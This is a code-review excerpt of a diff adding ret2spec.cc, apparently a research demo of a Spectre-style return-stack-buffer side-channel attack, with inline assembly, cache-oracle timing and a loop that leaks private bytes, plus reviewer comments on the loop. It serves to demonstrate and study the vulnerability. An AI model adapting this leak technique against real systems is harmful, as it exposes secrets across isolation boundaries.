demos/ret2spec.cc

```diff
@@ -0,0 +1,169 @@
+}
+
+static char leak_byte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  // This is volatile along with other local variable that are not used in the
+  // "speculation" call so that we save registers and avoid spillage before the
+  // "speculation" call.
+  for (volatile int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    volatile size_t safe_offset = run % strlen(data);
+    ForceRead(&isolated_oracle[static_cast<size_t>(data[safe_offset])]);
+
+    // Backup all registers and mark the end of the context backup with the
+    // 0xfedcba9801234567 value.
+    asm volatile(
+        "BACKUP_REGISTERS\n"
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+        "movq $0xfedcba9801234567, %rax\n"
+        "pushq %rax\n");
+#elif defined(__aarch64__)
+        "movz x9, 0x4567\n"
+        "movk x9, 0x0123, lsl 16\n"
+        "movk x9, 0xba98, lsl 32\n"
+        "movk x9, 0xfedc, lsl 48\n"
+        "str x9, [sp, #-16]!\n");
+#elif defined(__powerpc__)
+
+#else
+#  error Unsupported CPU.
+#endif
+
+    speculation(data, offset, isolated_oracle);
+
+    // Unwind the stack until we find the 0xfedcba9801234567 value and then
+    // restore all registers.
+    asm volatile(
+        "_afterspeculation:\n" // For MacOS.
+        "afterspeculation:\n" // For Linux.
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+        "movq $0xfedcba9801234567, %rax\n"
+        "popq %rbx\n"
+        "cmpq %rbx, %rax\n"
+        "jnz afterspeculation\n"
+#elif defined(__aarch64__)
+        "movz x11, 0x4567\n"
+        "movk x11, 0x0123, lsl 16\n"
+        "movk x11, 0xba98, lsl 32\n"
+        "movk x11, 0xfedc, lsl 48\n"
+        "ldp x9, x10, [sp], #16\n"
+        "cmp x11, x9\n"
+        "bne afterspeculation\n"
+#elif defined(__powerpc__)
+
+#else
+#  error Unsupported CPU.
+#endif
+        "RESTORE_REGISTERS\n");
+
+    volatile std::pair<bool, char> result =
+        sidechannel.RecomputeScores(data[safe_offset]);
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+int main() {
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < strlen(private_data); ++i) {
+    // On at least some machines, this will print the i'th byte from
+    // private_data, despite the only actually-executed memory accesses being
+    // to valid bytes in public_data.
```

Comment:
Yeah, let's just get rid of this loop and comment and instead explain how this program never accesses secret data, yet we're going to print it to the console regardless...

Reply:
You want to leak multiple characters in one speculation? We need some loop over the secret data, no?

Reply:
You're right, it doesn't make any sense for me to say "get rid of this loop". I was trying to say: let's write the specific loop we need here rather than continuing to repurpose the loop (and attendant comment) from the Spectre V1 example.

Reply:
Done.